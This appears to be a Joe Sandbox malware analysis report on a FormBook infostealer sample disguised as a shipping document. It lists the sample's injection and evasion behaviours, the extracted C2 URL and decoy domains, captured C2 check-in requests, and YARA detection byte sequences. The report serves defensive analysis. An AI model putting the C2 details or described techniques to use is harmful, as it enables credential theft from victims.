Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report SHIPPING DOCUMENT.exe

Overview

General Information

Sample Name:SHIPPING DOCUMENT.exe
Analysis ID:404217
MD5:25e847b9631bc2fe8d87fe4278fa142e
SHA1:641756a84fdce68e101a53cfa6809b68190b7ad7
SHA256:70dfd7bc81878d265e39803f73f55af96d7bf2a336408b52cc6005785fbe0415
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SHIPPING DOCUMENT.exe (PID: 7060 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
    • SHIPPING DOCUMENT.exe (PID: 7088 cmdline: 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: 25E847B9631BC2FE8D87FE4278FA142E)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 5756 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • NETSTAT.EXE (PID: 5752 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6948 cmdline: /c del 'C:\Users\user\Desktop\SHIPPING DOCUMENT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.1.SHIPPING DOCUMENT.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.SHIPPING DOCUMENT.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nszA951.tmp\2x6gdfzk.dllReversingLabs: Detection: 17%
          Multi AV Scanner detection for submitted fileShow sources
          Source: SHIPPING DOCUMENT.exeVirustotal: Detection: 34%Perma Link
          Source: SHIPPING DOCUMENT.exeReversingLabs: Detection: 44%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: SHIPPING DOCUMENT.exeJoe Sandbox ML: detected
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SHIPPING DOCUMENT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: SHIPPING DOCUMENT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: SHIPPING DOCUMENT.exe, 00000000.00000003.656956738.0000000003270000.00000004.00000001.sdmp, SHIPPING DOCUMENT.exe, 00000001.00000002.700435688.0000000000AA0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.916653689.00000000039BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SHIPPING DOCUMENT.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.926748711.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004059F0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,0_2_0040659C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 154.220.41.208:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.knighttechinca.com/dxe/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.barkinlot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.buyruon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.fuerzaagavera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.union-green.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=WjDhBMZGXEFchLZ7o6W3JT2VhJsjwIpQ+RcXbs0zm7DaFFVtu5gSyYsWe3hhttt0VKfM&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.barkinlot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sFVJxLIQKAVd+Y7XtG7gnaG34PPCpjG6GFyGl+6CuFNb0W3+mUMXX+9XGZNJldEnuWZ9&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.buyruon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=RbAtrmEWvlHFDlwUmkIgxTv6ob9YXkoV/NFTjoChCyM+ucvF9ABfViB5xXwNeUqJEtMU&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.fuerzaagavera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dxe/?k0GxOl=sOnMPkACxZJCHwFpI01WJHJoP6Rqh5hpLBOGFt1I8eGpOjOkLkuqJ1zaMIEMMNEsyDxC&NX1TzP=t8UH-PXh7J HTTP/1.1Host: www.union-green.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.barkinlot.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: SHIPPING DOCUMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SHIPPING DOCUMENT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.917278405.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpString found in binary or memory: http://www.yabovip1288.com
          Source: explorer.exe, 00000004.00000000.682293181.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?2f7ed51008e649f38c9a7a932b01f7d5
          Source: NETSTAT.EXE, 00000008.00000002.917087722.00000000042BF000.00000004.00000001.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=fuerzaagavera.com&origin=sales_
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040548D

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
